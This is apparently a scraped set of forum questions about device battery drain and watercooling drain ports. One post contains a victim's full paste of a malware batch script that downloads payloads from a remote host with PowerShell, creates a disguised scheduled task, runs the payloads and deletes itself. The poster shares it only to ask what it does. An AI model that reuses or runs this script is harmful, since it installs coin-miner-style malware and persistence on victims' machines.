Hello friends, I just got my first laptop pc which is also the first battery operated piece of tech I truly care about and I’m trying to make sure I don’t shorten it’s lifespan, I know it’s ok to leave the power plugged in overnight, what I’m curious on is: is it harmful to not let the battery drop below a certain percentage? Should it be allowed to drain closer to 0 before plugging it back in? MSI dragon center has this setting that lets it drop to 40% and only charges it to 60%, should I use this? Thank you for any input. MSI GE76 Dragon Tiamat 11UH-282

i noticed that if my phone going idle with everything off. bluetooth , air play etc. except wifi. i lost around 6 - 10% overnight. roughly 1 - 1.5% every hour at night. but when i turn off the wifi the battery is super solid at night without reduced charge. at maximum 1 - 2percent at night in term of battery health is still 100% and the efficiency when i browse my phone and watching netflix were pretty much okay like any other iphone. are the ip 12 user experience this? and is it a bug?,

Hi, My Ifi Hip Dac drains about 60% of battery in 20 hours when it is switched off and plugged into my computer which is also switched off. The battery doesn't drain when the USB cable unplugged from my computer but left plugged into my Hip Dac. My headphones are plugged in all the time. Is this a defect in the product or is this a design flaw? If you have an Ifi hip dac, can you test this too? Thanks

Hey how's it going, I have a Samsung Galaxy S7. I have been noticing battery drain issues, where the phone goes from 0 to 100 in one second, and it will not even turn on without being plugged into a charger. It's always shut off unless you use a charger. It only turns on if you plug it into a charger. I want to replace the battery and charging port of the device. Do you think that will be enough to fix the battery drain problem? Replacing the battery and charging port

Hello! I have build my first ever waterloop and I am quite happy with it so far. But I reallised a flaw with my draining system. As you can see from the pictures I have my drain Port on the lowest Point in my System, on the Radiator. The Order is as following: -Pump -GPU -Radiator (back to Pump) But I can't fully drain my System like that. Alot of Water stays in the Reservoir and the GPU Block. My Question now is: Can I change the order to -Pump -Radiator -GPU (back to Pump) ? This would mean that I can completely drain my system down to the last drop. Is it "allowed" to do it in this order? Or are there things I have to concider? Thanks!

Greetings. I need help with watercooling configuration. More specifically, I need a place to put a drain port, and the only place I can feasibly think of is on the side of the top rad, where there is another G1/4" thread. But it looks to be a very tight fit to even put a straight fitting on it, let alone a ball valve. Another option is to put a T-fitting on either the top rad where the fitting is at the front, or on the bottom rad near the PCIe brackets. Also, how does the T-fitting work? Would I have to attach another fitting to put tubing to fill/drain the loop? And how would I be able to safely remove that fitting (the fitting that gets attached to the T-fitting) and close it with the stopper? Sorry if these questions feel a little "basic," but I am new to watercooling and would like to do this right the first time to make upgrades at least somewhat easier. Thanks in advance.

So, I've been looking around to a potential issue of mine which would be the rapid battery drain on my Samsung Galaxy S9 phone. This is inconsistent with the pattern I've seen on many phones in past. I'm perfectly capable and willing to do a battery replacement on my phone but would rather not have to if I could and given the strange pattern (that is to say the inconsistency of this battery drain occurring over time not being consistent with the typical battery life shortening over time curve caused by the traditional culprit, the crystalline structure of the battery slowly become less and less uniform with repeated charging and discharging). The only issue I could think of/find is the microSD card being potentially faulty (Sandisk card used and brand new when original bought from T-mobile alongside phone purchase). Any way to get a more concrete idea of the situation without pulling out my card and doing a brute force test? S.M.A.R.T. for microSD cards on phone? Anything? Thank you for any and all help ladies and gentlemen. I await your reply.

Any help appreciated! I have a 15 inch Surface Book 2 i7 w/ GTX 1060, 16Gb Ram, and 500Gb SSD. Recently I updated windows (to what I thought was 1809 -- can they roll back?) and noticed some severe battery drain and heat issues. I just checked the Windows version and its running 1803 #17134. I'm not sure exactly what update caused this issue and im having a hard time finding info on it given the sea of complaints out there surrounding this machine. Previously I could go days without plugging in to the charger and now im struggling to get hours out of the battery... Battery life was one of the primary reasons why i got this machine, this bug is a real bummer. Anyone have a similar issue? I suspect its not limited to the SB2. Is there a Fix? Thanks for any help/info.

Hello everyone Today I noticed a weird process showing up in task manager, that's constantly consuming 45-50% of my cpu all the time The process is called sysmon.exe and i'm aware of it since a few hours ago. Everytime i kill the process it comes back. It also creates the .exe in the appdata/temp folder I've searched online but i didn't find almost anything about it. Also, I'm in the process of downloading an antivirus (used windows defender because i don't download or use suspicious stuff) I also thought that it might be some sort of coin miner but it wasn't using any internet Here's a screenshot of it: Also, here's the path to the file UPDATE: After some more digging, i found out that everytime, it creates a temp_XXXX folder (wher xxxx are random numbers) and in that folder it also creates 3 .bat files The start.bat file is just running the build.bat file but here's what i found when i opened the build.bat file At this point i'm 99% sure that this is some kind of coin miner/malware Here comes the fun part This is what i found when I opened the upd.bat file <spoiler> ping www.google.com -n 1 -w 1000 if %errorlevel% == 1 ( exit ) if not exist "%TEMP%\7za.exe" ( PowerShell -Command "Invoke-WebRequest -Uri http://31b4bd31f g1x2. org/7za.exe -OutFile \"%TEMP%\7za.exe\"" ) if not exist "%TEMP%\ppuarchive4.zip" ( PowerShell -Command "Invoke-WebRequest -Uri http://31b4bd31 fg1x2. org/packagenew_unsigned.zip -OutFile \"%TEMP%\ppuarchive4.zip\"" ) if not exist "%TEMP%\bcmuarchive12.zip" ( PowerShell -Command "Invoke-WebRequest -Uri http://31b4bd31f g1x2. org/packagehwloc_unsigned.zip -OutFile \"%TEMP%\bcmuarchive12.zip\"" ) if not exist "%TEMP%\tmg.ps1" ( PowerShell -Command "Invoke-WebRequest -Uri http://31b4bd31f g1x2. o rg/trackermagic.ps1 -OutFile \"%TEMP%\tmg.ps1\"" ) if not exist "%TEMP%\opokl.txt" ( PowerShell -NoLogo -Command "Invoke-WebRequest -Uri http://31b4bd 31fg1x2 .o rg/svchostc_task.xml -OutFile \"%TEMP%\svctask.xml\"" PowerShell -NoLogo -Command "(gc \"%TEMP%\svctask.xml\") -replace 'LOCALAPPDATA', '%LOCALAPPDATA%' | Out-File \"%TEMP%\svctask.xml\"" schtasks /Create /xml "%TEMP%\svctask.xml" /tn "svchostc" /F del "%TEMP%\svctask.xml" echo a > "%TEMP%\opokl.txt" ) if not exist "%LOCALAPPDATA%\WindowsDefenderTemp\update.vbs" ( PowerShell -Command "Invoke-WebRequest -Uri http://31b4bd31f g1x2. o rg/batch bot.vbs -OutFile \"%TEMP%\batchbot.vbs\"" PowerShell -Command "Invoke-WebRequest -Uri http://31b4bd31fg 1x2.or g/batchinstaller.bat -OutFile \"%TEMP%\batchinstaller.bat\"" PowerShell -Command "Invok e-WebRequest -Uri http://31b4bd 31fg1x2.o rg/batchtask.xml -OutFile \"%TEMP%\batchtask.xml\"" "%TEMP%\batchinstaller.bat" ) set list=FDBBBAD251AD958202EBB8D72746CEDC85DA45F2 8763B0C12D08BF29E40929B97A05D89721F8387D 4F4BA35DCA24DFA59E3CAADEA01C1094A1D0DB9F 39999E1648D457EC986B80CA2319C3B3E6B6C26B D0011BD12AA2D97084AC8D9E08FAA4C7307D616C EEFD9416DF1F743F26CD0B695C437626D951D752 FA58AD3904381B2E35CD233CD3DEFB13DB83FDC7 92B60DF728B47048D8354AB9C96ADCD60B25B01A 77E386B5AB1046DD872394DED2C93B312B93EAD1 (for %%a in (%list%) do ( powershell -NoLogo -ExecutionPolicy Bypass -File "%TEMP%\tmg.ps1" tracker.leechers-paradise.org 6969 %%a 90 powershell -NoLogo -ExecutionPolicy Bypass -File "%TEMP%\tmg.ps1" tracker.coppersurfer.tk 6969 %%a 90 powershell -NoLogo -ExecutionPolicy Bypass -File "%TEMP%\tmg.ps1" exodus.desync.com 6969 %%a 90 )) powercfg /SETACVALUEINDEX SCHEME_CURRENT 0012ee47-9041-4b5d-9b77-535fba8b1442 6738e2c4-e8a5-4a42-b16a-e040e769756e 0 powercfg /SETDCVALUEINDEX SCHEME_CURRENT 0012ee47-9041-4b5d-9b77-535fba8b1442 6738e2c4-e8a5-4a42-b16a-e040e769756e 0 powercfg /SETACVALUEINDEX SCHEME_CURRENT 238c9fa8-0aad-41ed-83f4-97be242c8f20 29f6c1db-86da-48c5-9fdb-f2b67b1f44da 0 powercfg /SETDCVALUEINDEX SCHEME_CURRENT 238c9fa8-0aad-41ed-83f4-97be242c8f20 29f6c1db-86da-48c5-9fdb-f2b67b1f44da 0 powercfg /SETACVALUEINDEX SCHEME_CURRENT 238c9fa8-0aad-41ed-83f4-97be242c8f20 9d7815a6-7ee4-497e-8888-515a05f02364 0 powercfg /SETDCVALUEINDEX SCHEME_CURRENT 238c9fa8-0aad-41ed-83f4-97be242c8f20 9d7815a6-7ee4-497e-8888-515a05f02364 0 powercfg /SETDCVALUEINDEX SCHEME_CURRENT 238c9fa8-0aad-41ed-83f4-97be242c8f20 bd3b718a-0680-4d9d-8ab2-e1d2b4ac806d 1 powercfg /SETACVALUEINDEX SCHEME_CURRENT 238c9fa8-0aad-41ed-83f4-97be242c8f20 bd3b718a-0680-4d9d-8ab2-e1d2b4ac806d 1 reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\GraphicsDrivers" /v TdrDelay /t REG_SZ /d "8" /f if not exist "%LOCALAPPDATA%\svc10.17134\d.txt" ( "%TEMP%\7za.exe" x "%TEMP%\ppuarchive4.zip" -o"%~dp0" -y "%~dp0\packagenew\buildpassive.bat" echo d > "%LOCALAPPDATA%\svc10.17134\d.txt" rmdir /s /q "%~dp0\packagenew" ) taskkill /f /im sysmon.exe ::tasklist /FI "IMAGENAME eq sysmon.exe" 2>NUL | find /I /N "sysmon.exe">NUL ::if "%ERRORLEVEL%"=="0" exit "%TEMP%\7za.exe" x "%TEMP%\bcmuarchive12.zip" -o"%~dp0" -y "%~dp0\packagehwloc\start.bat" start /b "" cmd /c del "%~dp0\upd.bat"&exit /b </spoiler> Yeah, so it surely is a virus or some sort of malware Could someone explain me what that code does? I'm trying to find a solution for a drain port on an aluminum loop, but I've been seemingly out of luck. I found an acrylic splitter that I can put some of EK's fittings into but I've been hard pressed to find a G1/4 male to male adapter to plug it into my pump, and then I also need to find some sort of ball valve of plug so I can seal off the port with a tube connected. Thanks.

3G at max bars vs 4G(LTE) at 2 to 3 bars of 5 what will drain more battery? :3

I recently updated to Windows 10 anniversary and I am noticing even more battery drain than I had previously. I updated it from a wiped machine (dont remember what it's called in win10). I went from about 7 hours of battery with moderate usage and stuff running in the background to under 4 hours with nothing but chrome and one note installed on the machine. I made adjustments in the settings and turned off connected standby so that I could gain access to the advanced power options. I made all the adjustments so maximize battery life and battery life did not budge. I dont know what else to do.

I'm trying to put together a watercooling loop for my pc. I know that eventually, I will need to drain the loop, and re-fill it. The case I have, the Corsair 750D, has a vertically oriented mount at the front of the case. Are there any rads out there that have inlet and outlet on opposite ends of the radiator? If not, would it be easier/simpler to get two single units, and orient them in the case to fit my particular needs?

Got my mom an LG Optimus G Pro a while ago. Everything went well back then so I didn't really checked on her phone at all. Recently went on a family trip and noticed her phone ran dry rather quickly as she complained quite a bit while we were out. Upon closer examination I found out she only had roughly 2.5 hours of screen on time! This is definitely not right. As I have never dealt with such problems before I need advise on how I should tackle this problem. If this helps: I can provide more info if necessary. All suggestions are appreciated thanks!

I am in the final stages of planning and buying all the parts for my loop and the only thing now outstanding is the drainage mechanism. I only have 1 output from my pump that can provide any assisted pressure (the rest would rely on gravity) so I wanted an inline solution right next to the pump to keep things as clean as possible (and an inline quick disconnect isn't possible as I am going for a hard line setup). My intention was to install a Y Connector directly to the pump that looks like this: The downward angled section would then have a quick disconnect attached to it for drainage: What I then wanted on the straight section would be an isolation valve so I could prevent the liquid travelling around the loop whilst draining it otherwise I will always have water in there. I have seen things like the bitspower valves but quite honestly they look disgusting and far too bulky. In the plumbing world you have isolation valves such as this which would be perfect: I have been searching for a couple of hours now with no luck and wanted to know if anyone knew if they existed with 1/4" threads specifically for PC watercooling or not? Thanks in advance.

so yeah got the HTC one m8 yesterday, amazing phones, fast as lightning etc. but the battery seem to be kinda bad... i'm losing around 1% per minute of use. it was at 100% are 14:00 and it's 18:00 and the phones at around 81%. i was watching a movie and every now and then i popped it up to text with my friends on facebook. it's on wifi\data connection all of the time, and i was wondering if that's normal, or is it just the fact that this is a new phone and is downloading a lot of stuff in the background? my battery usage is this: 24% on sense home, 22% chrome browser and another 20% on android system and 20% on a different android thing. so yeah is this normal? i've heard this phone can last a day and even 2 days sometimes so i wanted to see how it is on other people's phone. thanks

Hi I'm moving in about a month. Do I need to fully drain the loop in my 900D or should I be ok if I keep it vertically and move it carefully? What do you guys recommend? It is a big boy and weighs over 100lbs easy (3 1/2 litres of coolant). But my brother and I should be able to put it into the original box. This is what it looks like but I have added another 780 since I took the pic. Thanks in advance!

Hi, I got my Xperia Z1 about 6 months ago and when I got it at first my battery life was amazing, the battery was about 20 hours if not more. Now when I use it, it only lasts for about 6-7 hours, I don't use it much, only check some twitter and messages but that's it. Also my 3g/4g is not turned on, I only turn on wi-fi when i use my phone. Does anyone know what might cause this? Should I send my phone to sony? Thanks

The original article: http://onforb.es/Ua4e9l Google Chrome, unlike other browsers, sets it's tick rate (once every how many milliseconds the processor has to wake) to 1.000ms, while the idle rate is 15.625ms. To put it in simpler numbers, the processor has to wake 64 times per second in idle versus 1000 times per second when running Chrome. This problem is unique to Chrome on Windows. OSX and Linux don't use tick rates and other browsers have gone to dynamically adjusting the tick rate to the load that they are under. Even on a desktop computer, electricity wasting aside, this might noticeably slow down the computer. On a laptop, the battery will be used up much faster.
